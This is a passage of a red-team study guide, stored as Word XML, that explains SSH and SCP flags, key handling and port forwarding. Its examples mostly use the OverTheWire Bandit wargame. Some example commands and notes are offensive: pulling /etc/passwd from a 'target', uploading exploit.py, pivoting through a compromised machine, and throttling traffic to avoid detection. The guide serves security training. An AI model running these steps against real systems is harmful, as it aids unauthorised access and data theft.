      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The user@host part tells SSH who you are logging in as (user) and where (host — an IP or domain name).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2  All Important Flags — Explained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Flag / Option</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What it does</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Red Team relevance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-p [port]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Connect on a specific port instead of the default port 22.</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Many servers move SSH off port 22 to avoid automated scans. Bandit uses port 2220. Always check for SSH on non-standard ports during recon.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-i [keyfile]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Use a private key file for authentication instead of a password.</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Core skill — most servers in real engagements use key auth. If you find a private key on a compromised machine, this flag is how you use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-v</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Verbose — print detailed connection debug info.</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When SSH fails silently, -v tells you exactly why — wrong key, wrong user, refused connection,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-vv / -vvv</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Very verbose / extremely verbose debug output.</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Use -vvv when -v is still not showing you enough to diagnose the problem.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-L [local]:[host]:[remote]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Local port forwarding — tunnel traffic from your machine through SSH to a remote destination.</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Access internal services on a target network. e.g. tunnel a database port through SSH so you can reach it from your laptop.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-R [remote]:[host]:[local]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Remote port forwarding — expose a port on the remote machine that tunnels back to your machine.</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Reverse tunnels — useful when the target is behind a firewall and cannot be reached directly.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-D [port]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Dynamic port forwarding — creates a SOCKS proxy through the SSH connection.</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Proxy all your traffic through a compromised machine to access its internal network. Used in pivoting.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Do not execute any commands — just set up the tunnel. Used with -L, -R, -D.</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When you only want the tunnel and not an interactive shell. Cleaner and less noisy.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Disable pseudo-terminal allocation.</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Used in scripts where you do not need an interactive shell — prevents TTY-related errors.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-o StrictHostKeyChecking=no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Skip the 'are you sure you want to connect?' prompt for unknown hosts.</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Useful in scripts but be careful — skipping host verification can allow man-in-the-middle attacks.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-o ConnectTimeout=[n]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Give up connecting after n seconds.</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Useful in scripts and scanning — prevents hanging on unresponsive hosts.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-X</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Enable X11 forwarding — lets graphical apps on the remote machine display on your screen.</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Rarely used in red teaming but occasionally needed for GUI-based tools on a server.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-A</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Forward your SSH agent — lets the remote machine use your local SSH keys.</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Useful when hopping through multiple machines (SSH jumping). Avoid on untrusted machines — an attacker can hijack your agent.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-J [jump_host]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Jump through a proxy/bastion host to reach the final destination.</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Modern way to SSH through a jump host without manual chaining. e.g. ssh -J bastion user@internal_server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3  SSH Keys — How They Work</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A password is something you know. An SSH key is something you have. Keys are mathematically linked pairs:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Private key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">— stays on YOUR machine. Never share this. Ever.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Public key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">— goes on the remote machine (in ~/.ssh/authorized_keys). Anyone can see this.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When you connect, SSH uses maths to prove you have the private key that matches the public key — without ever sending the private key across the network.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Generating a key pair</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh-keygen -t ed25519 -C "your_label_here"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-t ed25519</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the algorithm. Ed25519 is modern and strong. RSA is older but also fine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — a comment/label so you remember what the key is for.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">It saves two files: id_ed25519 (private, keep secret) and id_ed25519.pub (public, share this).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Key file permissions — critical</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 600 ~/.ssh/id_ed25519</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH will refuse to use a private key if its permissions are too open. 600 means only the owner can read and write it — no one else can read it at all. This is what chmod 400 also achieves (read-only for owner).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4  Real Examples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Full Command</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What it does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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">ssh -p 2220 bandit0@bandit.labs.overthewire.org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Connect to Bandit as bandit0 on port 2220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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">ssh -i bandit14.private -p 2220 bandit14@bandit.labs.overthewire.org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Connect using a private key file instead of password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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">ssh -v -p 2220 bandit5@bandit.labs.overthewire.org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Verbose connection — see debug info if something fails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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">ssh -L 8080:localhost:80 user@target.com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Tunnel: access target's port 80 as localhost:8080 on your machine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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">ssh -D 1080 user@pivot_machine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Create SOCKS proxy through pivot_machine on local port 1080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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">ssh -J jump_host user@final_target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SSH through a jump host to reach an internal machine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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">ssh -N -L 3306:db_server:3306 user@pivot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Tunnel a MySQL port through a pivot — no shell, just the tunnel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="C0392B" w:sz="12"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Red Team Use: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH tunnelling (port forwarding) is one of the most powerful techniques in red teaming. Once you have a foothold on a machine inside a network, you can use SSH to pivot — reaching other machines that are not directly accessible from the internet. This is a month 6-8 skill but understanding the flags now builds the foundation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">4. SCP — Secure Copy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SCP (Secure Copy Protocol) copies files over an SSH connection. It uses the same authentication, same encryption, same port as SSH — it is essentially SSH with a file transfer purpose instead of a shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The key mental model: SCP is to files what SSH is to shells. If you can SSH somewhere, you can SCP files to and from it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1  Basic Syntax</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">scp [options] [source] [destination]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Either source or destination (or both) can be a remote path in the format:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">user@host:/path/to/file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If a path has no user@host: prefix, it is a local path on your own machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2  Direction of Copy — The Core Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Download FROM a remote machine TO your machine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">scp user@host:/remote/path/file.txt ./local_folder/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote is on the left of the local path. You are pulling something down.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload FROM your machine TO a remote machine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">scp ./local_file.txt user@host:/remote/path/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Local is on the left. You are pushing something up.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy between two remote machines (from your machine)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">scp user1@host1:/file.txt user2@host2:/destination/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You are the broker — the file goes from host1 to host2, coordinated from your machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3  All Important Flags — Explained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Flag / Option</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What it does</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Red Team relevance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-P [port]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Specify the SSH port (capital P — different from ssh which uses lowercase -p).</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Bandit uses port 2220:  scp -P 2220 ...  — forgetting the capital P is the most common SCP mistake.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-i [keyfile]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Use a private key file for authentication — same as SSH.</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When the remote server uses key auth instead of passwords. Same key you would use with ssh -i.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Recursive — copy entire directories, not just single files.</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Copy a whole folder off a target machine. Useful for grabbing config directories or log folders.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-v</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Verbose — show what is happening during the transfer.</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Diagnose why a copy is failing — shows authentication steps and file transfer progress.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-C</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Compress data during transfer.</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Faster transfers over slow connections. Rarely needed but useful on low-bandwidth links.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-l [limit]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Limit bandwidth to this many Kbits/sec.</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Avoid saturating a network connection — important in real engagements where loud traffic gets noticed.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-o [option]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Pass SSH options directly — same options as ssh -o.</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e.g. -o StrictHostKeyChecking=no to skip host verification prompts in scripts.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Route the copy through your local machine even when copying between two remotes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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More reliable than direct remote-to-remote copies. Slower but avoids authentication issues between the two remote machines.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4  Real Examples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Full Command</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What it does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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">scp -P 2220 bandit13@bandit.labs.overthewire.org:sshkey.private ./bandit14.key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Download the Bandit SSH key to your machine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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">scp -P 2220 -i mykey.pem user@target.com:/etc/passwd ./passwd_copy.txt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Download a file using key auth on a custom port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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">scp -P 2220 -r user@target.com:/var/log/ ./logs_backup/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Download an entire directory recursively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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">scp -P 2220 ./exploit.py user@target.com:/tmp/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Upload a file to a target machine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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">scp -P 2220 -v user@host:/file.txt ./</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Verbose download — useful for debugging failed transfers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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">scp -P 2220 -l 500 user@host:/large_file.zip ./</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Download while limiting to 500 Kbits/sec bandwidth</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="C0392B" w:sz="12"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Red Team Use: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
